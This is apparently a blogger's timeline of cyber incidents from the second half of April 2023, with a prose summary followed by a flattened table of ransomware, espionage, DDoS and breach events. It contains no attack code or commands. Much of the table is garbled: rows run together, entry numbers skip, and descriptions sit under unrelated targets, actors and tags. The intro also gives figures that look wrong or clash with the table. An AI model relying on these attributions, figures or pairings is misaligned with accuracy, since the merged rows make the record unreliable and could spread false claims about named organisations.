In the second half of April 2023 I collected 180 events (corresponding to 12 events/day), a sharp increase compared to the first timeline of April where the recorded events were 161.
The percentage of events caused by ransomware attacks is stable to 27.22% (49 out of 180 events, similar to 27.3% of the previous timeline (44 out of 161 events). The impact of vulnerabilities played a part in 26 out of 180 events corresponding to 14.4%, slihtly up from 12.4% of the first fortnight of April (20 out of 161 events).
Unsurprisingly, multi-million losses continued to plague the fintech sector: Both Merlin and 0VIX suffered a cyber heist leading to the theft of $2M worth in cryptocurrency (and they are not the only ones hit in this timeline, despite the other attacks did not achieve the same impact).
In terms of mega breaches there is one remarkable event, despite it is not completely clear, and it is the sale, on a Russian forum, of the details of 360 Chinese citizens. Other interesting event concern the arrest of an Ukrainian individual who stole the details of 360 European citizens, and the breaches of Terravision (2 million records compromised), the American Bar Association (1.5 million records compromised), and also NextGen Healthcare, victim of a ransomware attack compromising the details of 1.05 million users.
The Cyber Espionage front was always hot, with multiple campaigns unearthed also in the first half of April, and carried out by known threat actors such as the usual APT28, APT29, APT36, and also Sandworm tarketing Ukraine. Additionally it looks like Lazarus Group was also very active after the remarkable supply-chain attack to 3CX (and it looks like that even 3CX was compromised via a supply-chain attack).
And as always, this brief summary is closed by a quick mention to the attacks launched by the pro-Russian hacktivists of NoName057(16) and Killnet that were directed respectively against several websites in Italy, and individuals close to the NATO Last but not least, the collective Anonymous Sudan continued its campaign against Israel.
My suggestion is always the same: browse the timeline, and obviously thanks for sharing it and supporting my work in spreading the risk awareness across the community. As always, don’t forget to follow @paulsparrows on Twitter, or even connect on Linkedin, for the latest updates.
Geo Map April H1 2023
No Data Found
ID
Date Reported
Date Occurred
Date Discovered
Author
Target
Description
Attack
Target Class
Attack Class
Country
Link
Tags
1
16/04/2023
Since at least 16/04/2023
16/04/2023
LockBit 3.0
Multiple organizations
The LockBit ransomware gang has created encryptors targeting Macs for the first time, likely becoming the first major ransomware operation to ever specifically target macOS.
Malware
Multiple Industries
Cyber Crime
>1
LockBit, ransomware, macOS.
2
16/04/2023
'Over the past few months''
-
Mint Sandstorm AKA Phosphorous
Critical Infrastructures in the U.S.
Microsoft reveals that the Iranian hacking group known as 'Mint Sandstorm' is conducting cyberattacks on US critical infrastructure in what is believed to be retaliation for recent attacks on Iran's infrastructure.
Targeted Attack
Water supply, waste mgmt, remediation
Cyber Espionage
US
Microsoft, Iran, Mint Sandstorm, Phosphrous
3
16/04/2023
-
-
CrossLock
Valid Certificadora
Valid Certificadora, a Brazilian firm that issues digital certificates used by both businesses and public entities is added to the CrossLock ransomware leak site.
Malware
Professional, scientific and technical
Cyber Crime
BR
Valid Certificadora, CrossLock, ransomware
4
17/04/2023
From 2016 to present
-
Forty officers of China’s Ministry of Public Security (MPS)
Residents of the United States
Forty officers of China’s Ministry of Public Security (MPS), along with two officials of the Cyberspace Administration of China are accused of running a sophisticated troll farm directed at residents of the United States.
Coordinated Inauthentic Behavior
Individual
Cyber Warfare
US
China’s Ministry of Public Security, MPS, China, United States
5
17/04/2023
'Recently'
'Recently'
Trigona
Misconfigured Microsoft SQL (MS-SQL) servers
Researchers from AhnLab discover that attackers are hacking into poorly secured and Interned-exposed Microsoft SQL (MS-SQL) servers to deploy Trigona ransomware payloads and encrypt all files.
Misconfiguration
Multiple Industries
Cyber Crime
>1
AhnLab, Trigona, ransomware, Microsoft SQL, MS-SQL
6
17/04/2023
Early April 2023
Early April 2023
QBot (AKA QakBot, QuackBot, and Pinkslipbot)
Multiple organizations
Researchers from Kaspersky warn of a new QBot campaign leveraging hijacked business emails to deliver malware.
Malware
Finance and insurance
Cyber Crime
>1
QBot, QakBot, QuackBot, Pinkslipbot, Kaspersky
7
17/04/2023
Since at least January 2023
During January 2023
?
Taxpayers in Australia
Researchers from Cofense discover a highly spoofed phishing email campaign imitating the Australian Tax Office (ATO) and MyGov websites.
Account Takeover
Individual
Cyber Crime
AU
Cofense, Australian Tax Office, ATO, MyGov
8
17/04/2023
-
-
APT36 AKA Transparent Tribe
Indian government organizations, military personnel, and defense contractors
Researchers from Uptycs discover a new Linux malware, Poseidon, deployed by the Pakistani APT36 group targeting Indian government organizations, military personnel, and defense contractors and using the Kavach authentication tool, a two-factor authentication (2FA) solution provided by the Indian government for secure access to their email services, as a cover to deliver the Poseidon payload.
Targeted Attack
Public admin and defence, social security
Cyber Espionage
IN
Uptycs, Linux, Poseidon, Pakistan, India, APT36, Transparent Tribe, Kavach
9
17/04/2023
-
-
RedLine Stealer
Multiple organizations
Researchers from ESET, temporarily disrupt the operations of the RedLine Stealer with the help of GitHub, used as a dead drop resolver.
Malware
Multiple Industries
Cyber Crime
>1
ESET, RedLine Stealer, GitHub
10
17/04/2023
30/03/2023
30/03/2023
?
Evide
Evide, a data management company in Northern Ireland, is hit with a ransomware attack.
Malware
Information and communication
Cyber Crime
IE
Evide, Ransomware
11
17/04/2023
03/03/2023
03/03/2023
?
Traditions Bank
Traditions Bank files a notice of data breach after learning that an unauthorized party removed files containing confidential customer information from the bank’s computer system.
Unknown
Finance and insurance
Cyber Crime
US
Traditions Bank
12
17/04/2023
-
18/02/2023
?
Graceworks Lutheran Services
Graceworks Lutheran Services, a social services organization, suffered a breach that impacted 6,737 individuals, when the organization discovered unauthorized activity within its systems.§
Unknown
Human health and social work
Cyber Crime
US
Graceworks Lutheran Services
13
17/04/2023
25/12/2022
18/03/2023
?
Alaska Railroad Corporation (ARRC)
Alaska Railroad Corporation (ARRC) discloses to have suffered a cyber attack compromising the details of 7,413 individuals.
Unknown
Transportation and storage
Cyber Crime
US
Alaska Railroad Corporation, ARRC
14
17/04/2023
-
-
LockBit 3.0
Pineland Schools
Pineland Schools is added to the LockBit ransomware site with some files as proof of claim. The attackers claim to have 64GB of data.
Uniondale Union Free School District (UUFSD) in New York is added to Medusa’s leak site with some files leaked.
Malware
Education
Cyber Crime
US
Uniondale Union Free School District, UUFSD, Medusa, ransomware
16
18/04/2023
-
-
APT28 AKA Fancy Bear, STRONTIUM, Sednit, and Sofacy,
Multiple organizations
The UK National Cyber Security Centre (NCSC), US Cybersecurity and Infrastructure Security Agency (CISA), NSA, FBI, and Cisco warn of Russian state-sponsored APT28 hackers deploying a custom malware named 'Jaguar Tooth' on Cisco IOS routers, exploiting CVE-2017-6742, allowing unauthenticated access to the device.
Targeted Attack
Multiple Industries
Cyber Espionage
>1
APT28, Fancy Bear, STRONTIUM, Sednit, Sofacy, UK National Cyber Security Centre, NCSC, US Cybersecurity and Infrastructure Security Agency, CISA, NSA, FBI, Cisco, Jaguar Tooth, Cisco IOS, CVE-2017-6742
17
18/04/2023
-
-
Play
Multiple organizations
Security Researchers at Symantec/Broadcom reveal that the Play ransomware group has developed two custom tools in .NET, namely Grixba and VSS Copying Tool, used to improve the effectiveness of its cyberattacks.
Google releases a security update for the Chrome web browser to fix CVE-2023-2136, the second zero-day vulnerability found to be exploited in attacks this year.
CVE-2023-2136 Vulnerability
Unknown
N/A
N/A
Google, Chrome, CVE-2023-2136
19
18/04/2023
16/03/2023
16/03/2023
Royal
Town of Ballwin
The local government of Ballwin, a St. Louis, Missouri suburb is investigating a “network security incident” that is believed to have started last month but is still affecting systems. The Royal ransomware gang claims responsibility for the attack.
Malware
Public admin and defence, social security
Cyber Crime
US
Ballwin, St. Louis, Royal, ransomware
20
18/04/2023
During 2022
During 2022
?
Israeli citizen involved in the country's protest movement
Researchers from Citizen Lab reveal that the controversial Israeli spyware tool Pegasus from NSO Group exploited the 'LATENTIMAGE' iOS zero day vulnerability to allegedly target an unrevealed Israeli citizen involved in the country's protest movement.
Researchers from Citizen Lab reveal that the controversial Israeli spyware tool Pegasus from NSO Group exploited the 'FINDMYPWN' iOS 15 zero day vulnerability to target members of Mexico’s civil society.
Targeted Attack
Individual
Cyber Espionage
MX
Centro PRODH, Citizen Lab, Pegasus, NSO Group, FINDMYPWN, iOS 15
22
18/04/2023
During October 2022
During October 2022
?
Human rights defender from Centro PRODH
Researchers from Citizen Lab reveal that the controversial Israeli spyware tool Pegasus from NSO Group exploited the 'PWNYOURHOME' iOS 15 and iOS 16 zero day vulnerability to target members of Mexico’s civil society.
The U.S. Cybersecurity and Infrastructure Security Agency (CISA) adds an old Apple’s macOS vulnerability to its list of currently exploited flaws.
CVE-2019-8526 Vulnerability
Unknown
N/A
US
U.S. Cybersecurity and Infrastructure Security Agency, CISA, CVE-2019-8526, macOS
24
18/04/2023
During fall of 2022
Since 30/06/2022
MuddyWater (AKA MERCURY, Mango Sandstorm, Seedworm, and Static Kitten) and DEV-1084 (AKA Storm-1084)
Multiple organizations
Researchers from Group-IB discover a new campaign by the Iranian government-sponsored threat actor known as MuddyWater, using the legitimate SimpleHelp remote support software tool to achieve persistence on victim devices.
Targeted Attack
Multiple Industries
Cyber Espionage
>1
Group-IB, MuddyWater, SimpleHelp
25
18/04/2023
Since December 2022
16/04/2023
?
Early adopters of cryptocurrency and blockchain technology
A mysterious and sophisticated crypto wallet heist has drained up to 5,000 Ethereum, currently worth almost USD 10 million, from "OG" wallets (wallets of early adopters).
Unknown vulnerability
Fintech
Cyber Crime
>1
Ethereum, OG Wallets
26
18/04/2023
'Recently'
'Recently'
?
Multiple organizations
Researchers from Zscaler discover a new multifunctional backdoor called 'Devopt'.
Malware
Multiple Industries
Cyber Crime
>1
Researchers from Citizen Lab reveal that the controversial Israeli spyware tool Pegasus from NSO Group exploited the 'PWNYOURHOME' iOS 15 and iOS 16 zero day vulnerability to target members of Mexico’s civil society.
27
18/04/2023
During March 2023
During March 2023
APT-C-36 AKA Blind Eagle
Multiple organizations
Researchers from ThreatMon discover a new campaign by the cyber espionage actor tracked as Blind Eagle using a new multi-stage attack chain that leads to the deployment of the NjRAT remote access trojan on compromised systems.
Targeted Attack
Multiple Industries
Cyber Espionage
EC
ES
CL
CO
APT-C-36, Blind Eagle, ThreatMon, NjRAT
28
18/04/2023
During 2022
During 2022
Raspberry Robin
Multiple organizations
Researchers from Check Point discover a new version of the Raspberry Robin using new anti-evasion techniques.
Malware
Multiple Industries
Cyber Crime
>1
Check Point, Raspberry Robin
29
18/04/2023
Between March 2022 and May 2022
-
?
Huntington Ingalls Industries (HII)
Huntington Ingalls Industries (HII) files a notice of data breach after learning that confidential consumer information stored on the company’s computer network was accessed by an unauthorized party.
Unknown
Manufacturing
Cyber Crime
US
Huntington Ingalls Industries, HII
30
18/04/2023
-
01/12/2022
?
West Technology Group (WTG)
West Technology Group (WTG) files a notice of data breach after confirming that an unauthorized party was able to access and remove confidential employee information from the company’s computer network.
Unknown
Information and communication
Cyber Crime
US
West Technology Group, WTG
31
18/04/2023
27/10/2022
Between 26/10/2022 and 27/10/2022
?
Bryant Bank
Bryant Bank files a notice of data breach after determining that an unauthorized party was able to access confidential customer information stored on the company’s computer network.
Unknown
Finance and insurance
Cyber Crime
US
Bryant Bank
32
18/04/2023
-
-
Royal
Lake Dallas Independent School District
The Royal ransomware gang adds Lake Dallas Independent School District in Texas to its leak site.
Malware
Education
Cyber Crime
US
Royal, ransomware, Lake Dallas Independent School District
33
18/04/2023
From 18/04/2023
From 18/04/2023
NoName057(16)
Multiple websites in Italy
The pro-Russian hacktivist group KillNet starts its campaign agan Italy and takes down multiple websites including the Italian Labour Ministry, Carabinieri, the Italian High Council of the Judiciary (Consiglio Superiore Della Magistratura), Azienda Trasporti Milanesi (ATM), multiple airports, several banks, the Ministry of Infrastructure and Transport.
DDoS
Multiple Industries
Hacktivism
IT
Russia, KillNet, Italian Labour Ministry, Ministero del Lavoro, Carabinieri, High Council of the Judiciary, Consiglio Superiore Della Magistratura, Azienda Trasporti Milanesi, ATM, Ministry of Infrastructure and Transport
34
19/04/2023
19/04/2023
19/04/2023
Killnet
EUROCONTROL
Europe’s air-traffic control agency EUROCONTROL announces to be under attack from the Killnet pro-Russian attackers.
DDoS
Extraterritorial orgs and bodies
Hacktivism
EU
Killnet, EUROCONTROL, Russia
35
19/04/2023
Over the past few months
Over the past few months
Russian Wagner-like cyber groups
Critical Infrastructure in the UK
The British government warns that “emerging Wagner-like cyber groups are attempting to cause maximum damage to the UK's critical national infrastructure.
Unknown
Electricity, gas steam, air conditioning
Cyber Warfare
UK
British Government, Wagner
36
19/04/2023
Since at least 18/04/2023
18/04/2023
Ghostwriter
Individuals in Poland
Poland's Ministry of National Defense issues a warning about a recent disinformation campaign traced back to the Belarusian hacking group known as Ghostwriter.
Coordinated Inauthentic Behavior
Individual
Cyber Warfare
PL
Ministry of National Defense, Belarus, Ghostwriter
37
19/04/2023
-
-
FIN11 and TA505 (Clop AKA Cl0p)
Unknown organization(s)
Print management software developer PaperCut warns customers to update their software immediately, as hackers are actively exploiting two flaws, ZDI-CAN-18987 / PO-1216 and ZDI-CAN-19226 / PO-1219, to gain access to vulnerable servers. Later the attacks are attributed to the Cl0p ransomware gang.
ZDI-CAN-18987 / PO-1216 (CVE-2023-27350) and ZDI-CAN-19226 / PO-1219 (CVE-2023-27351) Vulnerabilities
Researchers from Sophos reveal that threat actors are using a new hacking tool dubbed AuKill to disable Endpoint Detection & Response (EDR) Software on targets' systems before deploying backdoors and ransomware in Bring Your Own Vulnerable Driver (BYOVD) attacks.
Malware
Multiple Industries
Cyber Crime
>1
Sophos, AuKill, Endpoint Detection & Response, EDR, Bring Your Own Vulnerable Driver, BYOVD
39
19/04/2023
Since November 2022
During Q1 2022
Sandworm AKA FROZENBARENTS
Energy sector organizations in Eastern Europe
Researchers from Google's Threat Advisory Group (TAG) reveal that the Russian threat actor Sandworm conducted multiple campaigns against energy sector organizations in Eastern Europe, delivering links to fake Windows update packages hosted on a domain spoofing the Caspian Pipeline Consortium (CPC).
Researchers from Google's Threat Advisory Group (TAG) reveal that the Russian threat actor Sandworm targeted the Ukrainian defense industry in multiple credential phishing campaigns.
Researchers from Google's Threat Advisory Group (TAG) reveal that the Russian threat actor Sandworm targeted users following Pro-Russia Telegram channels with a phishing campaign.
Researchers from Google's Threat Advisory Group (TAG) reveal that actors attributed to the GRU have maintained a Telegram channel to promote and amplify narratives related to the use of biological weapons in Ukraine and how the United States is responsible for the proliferation of biological weapons around the world.
Actors affiliated with the Internet Research Agency (IRA)
Internet users
Researchers from Google's Threat Advisory Group (TAG) observe a coordinated Information Operation (OP) campaign from actors affiliated with the Internet Research Agency (IRA) creating content on YouTube, including commenting and upvoting each other’s videos, focusing particularly on narratives supportive of Russia and the business interests of Russian oligarch Yevgeny Prigozhin, especially the Wagner Group.
Coordinated Inauthentic Behavior
Information and communication
Cyber Warfare
>1
Google, Threat Advisory Group, TAG, Russia, Ukraine, Information Operation, OP, Internet Research Agency, IRA, YouTube, Yevgeny Prigozhin, Wagner Group
45
19/04/2023
Since April 2023
During April 2023
?
Multiple organizations
Researchers from Sucuri reveal that attackers are using Eval PHP, an outdated legitimate WordPress plugin, to compromise websites by injecting stealthy backdoors.
Vulnerable WordPress plugin
Multiple Industries
Cyber Crime
>1
Sucuri, Eval PHP, WordPress
46
19/04/2023
17/04/2023
17/04/2023
?
Point32Health
Point32Health, a New England health insurance firm serving more than two million people, is dealing with a ransomware attack impacting several of its systems.
Malware
Finance and insurance
Cyber Crime
US
Point32Health, ransomware
47
19/04/2023
During April 2023
During April 2023
Russia
Organizations in Finland
Kirsi Karlamaa, director general of the Finnish Transport and Communications Agency (Trafficom) reveals that Finnish organizations are increasingly being targeted with cyberattacks, two weeks after the country officially joined the North Atlantic Treaty Organization.
N/A
Multiple Industries
Cyber Espionage
FI
Kirsi Karlamaa, Finnish Transport and Communications Agency, Trafficom, NATO, North Atlantic Treaty Organization, Russia
48
19/04/2023
Between Q4 2021 and Q4 2022
Between Q4 2021 and Q4 2022
Multiple threat actors
Multiple organizations
Researchers from Palo Alto Networks warn of a malicious spike of InterPlanetary File System (IPFS) exploited by threat actors for multiple malicious purposes, including phishing, credential theft, command and control communications, and malicious payload distribution.
Researchers from Malwarebytes warn of a new wave of 'Muse scams', that Instagram scams where the attackers promise money in exchange for the victims' image.
Instagram scam
Individual
Cyber Crime
>1
Malwarebytes, Muse scam, Instagram
50
19/04/2023
-
-
?
Rubino & Company
Rubino & Company files a notice of data breach after learning that confidential consumer information stored on the company’s IT network was subject to unauthorized access.
Unknown
Professional, scientific and technical
Cyber Crime
US
Rubino & Company
51
19/04/2023
19/10/2022
19/10/2022
?
IMA Financial Group
IMA Financial Group files a notice of data breach after experiencing a data security incident resulting in confidential consumer data being made accessible to an unauthorized party.
Unknown
Finance and insurance
Cyber Crime
US
IMA Financial Group
52
19/04/2023
-
-
LockBit 3.0
Banco de Venezuela
Banco de Venezuela is added to LockBit’s ransomware leak site with some alleged proof of claims that included identity cards and documents.
Malware
Finance and insurance
Cyber Crime
VE
Banco de Venezuela, LockBit, LockBit 3.0, ransomware
53
19/04/2023
-
-
Play
Coldiretti
Coldiretti, the Italian organization of agricultural entrepreneurs, suffers a Play ransomware attack.
Malware
Other service activities
Cyber Crime
IT
Coldiretti, Play, ransomware
54
20/04/2023
-
29/03/2023
Lazarus Group AKA Labyrinth Collima, Covellite, UNC4034, Zinc, Nickel Academy)
Trading Technologies
Researchers from Mandiant reveal that the 3CX supply chain attack was caused by another supply chain compromise where suspected North Korean attackers breached the site of stock trading automation company Trading Technologies to push trojanized software builds.
Lazarus Group AKA Labyrinth Collima, Covellite, UNC4034, Zinc, Nickel Academy)
People working in software or DeFi platforms
Researchers from ESET discover a new Lazarus campaign considered part of "Operation DreamJob" (AKA Nukesped), targeting Linux users with malware for the first time.
Even the Europa.eu website is observed serving Fortnite spam within the same campaign.
TWiki or MediaWiki vulnerabilities
Extraterritorial orgs and bodies
Cyber Crime
EU
Europa.eu, Fortnite, TWiki, MediaWiki
59
20/04/2023
17/03/2023
Between 06/03/2023 and 17/03/2023
?
American Bar Association (ABA)
The American Bar Association (ABA) discloses a data breach after hackers compromised its network and gained access to older credentials for 1,466,000 members.
Unknown
Professional, scientific and technical
Cyber Crime
US
American Bar Association, ABA
60
20/04/2023
Since. at least 16/02/2023
Since. at least 16/02/2023
?
Multiple organizations
Researchers at Secureworks discover a new campaign using Google Ads and SEO Poisoning to distribute the Bumblebee malware promoting popular software like Zoom, Cisco AnyConnect, ChatGPT, and Citrix Workspace.
Malware
Multiple Industries
Cyber Crime
>1
Secureworks, Google Ads, SEO Poisoning, Bumblebee, Zoom, Cisco AnyConnect, ChatGPT, Citrix Workspace
61
20/04/2023
During March 2023
During March 2023
EvilExtractor
Multiple organizations in Europe and the U.S.
Researchers from Fortinet discover a rise in attacks spreading the EvilExtractor data theft tool, used to steal users' sensitive data in Europe and the U.S.
Malware
Multiple Industries
Cyber Crime
EU
US
Fortinet, EvilExtractor
62
20/04/2023
Since at least early April 2023
During early April 2023
Decoy Dog
Multiple organizations
Researchers from Infoblox discover a new enterprise-targeting malware toolkit called ‘Decoy Dog’ after inspecting anomalous DNS distinctive from regular internet activity.
Malware
Multiple Industries
Cyber Crime
>1
Infoblox, Decoy Dog
63
20/04/2023
SInce 25/01/2023
During January 2023
Xiaoqiying AKA Genesis Day or Teng Snake
Multiple organizations in South Korea including the Korean Research Institute for Construction Policy, the Korean Archaeological Society, the Woorimal Academic Society, the Korean Academy of Basic Medicine & Health Science, and more.
Researchers from Recorded Future discover a new wave of attacks of the Chinese threat actor known as Xiaoqiying, targeting organizations in North Korea.
Targeted Attack
Multiple Industries
Cyber Espionage
KR
Xiaoqiying, Genesis Day, Teng Snake, China, South Korea, Korean Research Institute for Construction Policy, Korean Archaeological Society, Woorimal Academic Society, Korean Academy of Basic Medicine & Health Science, Recorded Future
64
20/04/2023
'Recently'
'Recently'
Xiaoqiying AKA Genesis Day or Teng Snake
Organizations in Japan and Taiwan
Researchers from Recorded Future discover a new wave of attacks of the Chinese threat actor known as Xiaoqiying, targeting organizations in in Japan and Taiwan
Targeted Attack
Multiple Industries
Cyber Espionage
JP
TW
Xiaoqiying, Genesis Day, Teng Snake, China
65
20/04/2023
Since at least November 2022
-
Evasive Panda (AKA BRONZE HIGHLAND and Daggerfly)
Telecommunications organization in Africa
Researchers from Broadcom/Symantec discover a new campaign of the Chinese Daggerfly threat actor targeting a telecommunications organization in Africa via the PlugX and MgBot malware framework.
Researchers from Palo Alto Networks reveal a 910% increase in monthly registrations for domains related to ChatGPT and associated to scam operations.
Scam
Multiple Industries
Cyber Crime
>1
Palo Alto Networks, ChatGPT
67
20/04/2023
12/04/2023
12/04/2023
?
Fincantieri Marinette Marine
Fincantieri Marinette Marine, a US commercial and defense shipbuilder with ties to the government, discloses to have been hit by a ransomware attack.
Malware
Professional, scientific and technical
Cyber Crime
US
Fincantieri Marinette Marine, ransomware
68
20/04/2023
-
-
Shiny Hunters
RentoMojo
Indian start-up furniture rental platform RentoMojo discloses a data breach impacting over 150,000 subscribers.
Unknown
Wholesale and retail
Cyber Crime
IN
RentoMojo, Shiny Hunters
69
20/04/2023
During 2022
During August 2022
Fakecalls
Android users in South Korea
Researchers from McAfee discover a new Fakecalls campaign using legitimate app signing keys to evade signature-based detection techniques.
Malware
Individual
Cyber Crime
KR
McAfee, Fakecalls, Android
70
20/04/2023
Since at least 20/04/2023
20/04/2023
?
Nordea Bank customers
Researchers from Heimdal discover a smishing campaign against Nordea Bank customers,
Account Takeover
Finance and insurance
Cyber Crime
NO
Heimdal, Nordea Bank
71
20/04/2023
-
-
?
Multiple organizations
Researchers from Avanan discover a phishing campaign hosting the malicious pages on Linktree, a social media reference platform.
Account Takeover
Multiple Industries
Cyber Crime
>1
Avanan, Linktree
72
20/04/2023
-
-
Killnet
Individuals with ties to NATO
The pro-Russian hacktivist group KillNet leaks stolen data allegedly belonging to around 5,000 individuals with ties to NATO.
Unknown
Unknown
Hacktivism
>1
Killnet, Russia, NATO
73
21/04/2023
'Recently'
'Recently'
?
Misconfigured Kubernetes clusters
Researchers from Aqua Security discover 'RBAC Buster', a campaign exploiting RBAC (Role-Based Access Control) to create persistent backdoor accounts on Kubernetes clusters and hijack their resources for Monero crypto-mining.
Misconfiguration
Multiple Industries
Cyber Crime
>1
Aqua Security, RBAC Buster, RBAC, Role-Based Access Control, Kubernetes, Monero
74
21/04/2023
-
-
Lazarus Group AKA Labyrinth Collima, Covellite, UNC4034, Zinc, Nickel Academy)
Several critical infrastructure organizations in the United States and Europe
Researchers from Symantec/Broadcom reveal that the software supply chain attack that led to last month's 3CX breach has also impacted at least several critical infrastructure organizations in the United States and Europe.
Targeted Attack
Electricity, gas steam, air conditioning
Cyber Espionage
US
EU
Symantec, Broadcom, 3CX
75
21/04/2023
'Recently'
'Recently'
BlueNoroff
Multiple organizations
Researchers from Jamf observe the North Korea-linked BlueNoroff threat group using a new macOS malware family dubbed RustBucket.
Malware
Multiple Industries
Cyber Espionage
>1
Jamf, BlueNoroff, macOS, RustBucket
76
21/04/2023
'Recently'
'Recently'
8220
Korean energy-related companies
Researchers from AhnLab discover a new campaign of the 8220 Gang exploiting the Log4Shell vulnerability to install CoinMiner in VMware Horizon servers.
Albertsons Companies files a notice of data breach after learning that confidential information belonging to certain individuals was accessed by an unauthorized party following a malware attack.
Malware
Wholesale and retail
Cyber Crime
US
Albertsons Companies
78
21/04/2023
Between 17/02/2023 and 23/02/2023
21/02/2023
?
Robeson Health Care Corporation
Robeson Health Care Corporation files a notice of data breach after learning that confidential patient data was accessed by an unauthorized party following a malware attack.
Malware
Human health and social work
Cyber Crime
US
Robeson Health Care Corporation
79
21/04/2023
-
-
ALPHV AKA BlackCat
Saville Row
Saville Row, a Chilean clothing store, is added to BlackCat’s ransomware leak site.
Malware
Wholesale and retail
Cyber Crime
CL
ALPHV, BlackCat, Saville Row, ransomware
80
21/04/2023
-
-
ALPHV AKA BlackCat
Seguros la Occidental
Seguros la Occidental, a Venezuelan insurer that offers general and life insurance products, is added to BlackCat’s ransomware leak site with samples containing 27 screenshots of images of various insurance company documents that included ID cards.
Malware
Finance and insurance
Cyber Crime
VE
ALPHV, BlackCat, Seguros la Occidental, ransomware
81
21/04/2023
-
-
ALPHV AKA BlackCat
Cementos Progreso
Cementos Progreso is added to BlackCat’s ransomware leak site. As proof, they offer some samples with internal documents.
Malware
Professional, scientific and technical
Cyber Crime
GT
ALPHV AKA BlackCat, ransomware, Cementos Progreso
82
22/04/2023
-
-
?
Vopak
Vopak, a tank storage company known for its storage of fossil fuels, is the victim of a ransomware attack.
Malware
Transportation and storage
Cyber Crime
NL
Vopak, ransomware
83
22/04/2023
-
-
Cl0p AKA Clop
Allied Benefit
The Cl0p ransomware gang leaks some data from Allied Benefit allegedly exfiltrated exploiting the CVE-2023-0669 Fortra GoAnywhere MFT Vulnerability.
The Cl0p ransomware gang claims to have hacked Tropical Texas Behavioral Health, allegedly exfiltrated exploiting the CVE-2023-0669 Fortra GoAnywhere MFT Vulnerability.
The Cl0p ransomware gang claims to have hacked Alivia Health in Puerto Rico, allegedly exfiltrated exploiting the CVE-2023-0669 Fortra GoAnywhere MFT Vulnerability.
The Cl0p ransomware gang claims to have hacked ITx, a revenue management company, allegedly exfiltrated exploiting the CVE-2023-0669 Fortra GoAnywhere MFT Vulnerability.
Trust Wallet discloses to have patched a security vulnerability that had led to its users losing nearly $170,000.
Vulnerability
Fintech
Cyber Crime
N/A
Trust Wallet
91
23/04/2023
27/03/2023
23/04/2023
BianLian and RansomHouse
Albany ENT & Allergy Services
Both BianLian and RansomHouse ransomware gangs list Albany ENT & Allergy Services in their leak site.
Malware
Human health and social work
Cyber Crime
US
Both BianLian, RansomHouse, ransomware, Albany ENT & Allergy Services
92
23/04/2023
-
-
ALPHV AKA BlackCat
Naivas
Kenya’s Naivas supermarket chain is the victim of a BlackCat ransomware incident.
Malware
Wholesale and retail
Cyber Crime
KE
ALPHV, BlackCat, Naivas, ransomware
93
23/04/2023
During February 2023
23/04/2023
?
Terravision
The Airport transfers service Terravision suffers a data breach, exposing over 2M records of customer data including names, phone numbers, email addresses, salted password hashes and in some cases, date of birth and country of origin.
Unknown
Transportation and storage
Cyber Crime
IT
Terravision
94
24/04/2023
-
22/04/2023
Black Basta
Yellow Pages Canada
Yellow Pages Canada, a Canadian directory publisher confirms to have been hit by a cyber attack. The Black Basta ransomware and extortion gang claims responsibility for the attack and posts sensitive documents and data over the weekend.
Malware
Administration and support service
Cyber Crime
CA
Yellow Pages Canada, Black Basta, ransomware
95
24/04/2023
24/04/2023
24/04/2023
?
KuCoin's Twitter account
The cryptocurrency exchange KuCoin's Twitter account is hacked, allowing attackers to promote a fake giveaway scam that led to the theft of over $22.6K in cryptocurrency.
Account Takeover
Fintech
Cyber Crime
N/A
KuCoin, Twitter
96
24/04/2023
Since at least mid-April 2023
mid-April 2023
?
Multiple organizations
The Mirai malware botnet is actively exploiting a TP-Link Archer A21 (AX1800) WiFi router vulnerability tracked as CVE-2023-1389 to incorporate devices into DDoS (distributed denial of service) swarms.
Researchers from Trend Micro discover a new version of the ViperSoftX information-stealing malware with a broader range of targets, including targeting the KeePass and 1Password password managers.
Malware
Multiple Industries
Cyber Crime
>1
Trend Micro, ViperSoftX, KeePass, 1Password
98
24/04/2023
-
-
?
Unknown organization(s)
The Cybersecurity and Infrastructure Security Agency (CISA) adds CVE-2023-28432, a vulnerability affecting a tool called MinIO which is used widely for machine learning, analytics and more, to its catalog of exploited vulnerabilities.
CVE-2023-28432 Vulnerability
Unknown
N/A
US
Cybersecurity and Infrastructure Security Agency, CISA, CVE-2023-28432, MinIO
99
24/04/2023
During 2020 elections
During 2020 elections
Pioneer Kitten
Undisclosed U.S. city's local infrastructure
The U.S. Cybersecurity and Infrastructure Security Agency (CISA) and the Cyber National Mission Force (CNMF) reveal that during the elections of 2020, Pioneer Kitten, an Iran-linked hacking group, had “gained access to a city's local infrastructure that would be used to record the results of voting for the 2020 elections.”
Unknown
Public admin and defence, social security
Cyber Espionage
US
Cybersecurity and Infrastructure Security Agency, CISA, Cyber National Mission Force, CNMF, Pioneer Kitten, Iran, 2020 elections
100
24/04/2023
'Recently'
'Recently'
Foreign-based cybercriminals
Three U.S. civilian federal agencies
The U.S. Cybersecurity and Infrastructure Security Agency (CISA) reveals that it had “recently” detected three civilian federal agencies “facing an intrusion campaign from foreign-based cybercriminals.”
Unknown
Public admin and defence, social security
N/A
US
Cybersecurity and Infrastructure Security Agency, CISA
101
24/04/2023
Since 2020
-
Nomadic Octopus AKA DustSquad
Tajikistan’s high ranking government officials, public service infrastructures, and telecoms services
Researchers from Prodaft reveal the details of Paperbug, a campaign carried out by the Russian espionage group tracked as Nomadic Octopus has been observed spying on Tajikistan’s high ranking government officials, public service infrastructures, and telecoms services, likely by infiltrating a mobile phone carrier.
Researchers from Kaspersky reveal the details of Tomiris, a Russian threat actor focusing on intelligence gathering in Central Asia, and using KopiLuwak and TunnusSched, tools borrowed from the Turla APT group.
Targeted Attack
Multiple Industries
Cyber Espionage
>1
Tomiris, Turla, KopiLuwak, TunnusSched,
103
24/04/2023
'Recently'
'Recently'
DoNot APT
Individual residing in Kashmir
Researchers from Cyfirma discover a new campaign by the DoNot APT group targeting Individual residing in Kashmir via two malware strains delivered via fake WhatsApp applications.
Targeted Attack
Individual
Cyber Espionage
IN
Cyfirma, DoNot APT, Kashmir, WhatsApp
104
24/04/2023
Since at least the beginning of March 2023
During March 2023
?
Multiple organizations
Researchers from ReversingLabs discover a new campaign pushing malware on the Python Package Index (PyPI) under the guise of termcolour, a legitimate yet abandoned open source module.
Malware
Multiple Industries
Cyber Crime
>1
ReversingLabs, Python Package Index, PyPI
105
24/04/2023
-
-
?
Individuals
Researchers from Malwarebytes discover a malvertising scheme leading to clickjacking.
Malvertising
Individual
Cyber Crime
>1
Malwarebytes
106
24/04/2023
24/04/2023
24/04/2023
Sharpboys
ATID Group (Academy for Torah Initiatives and Directions)
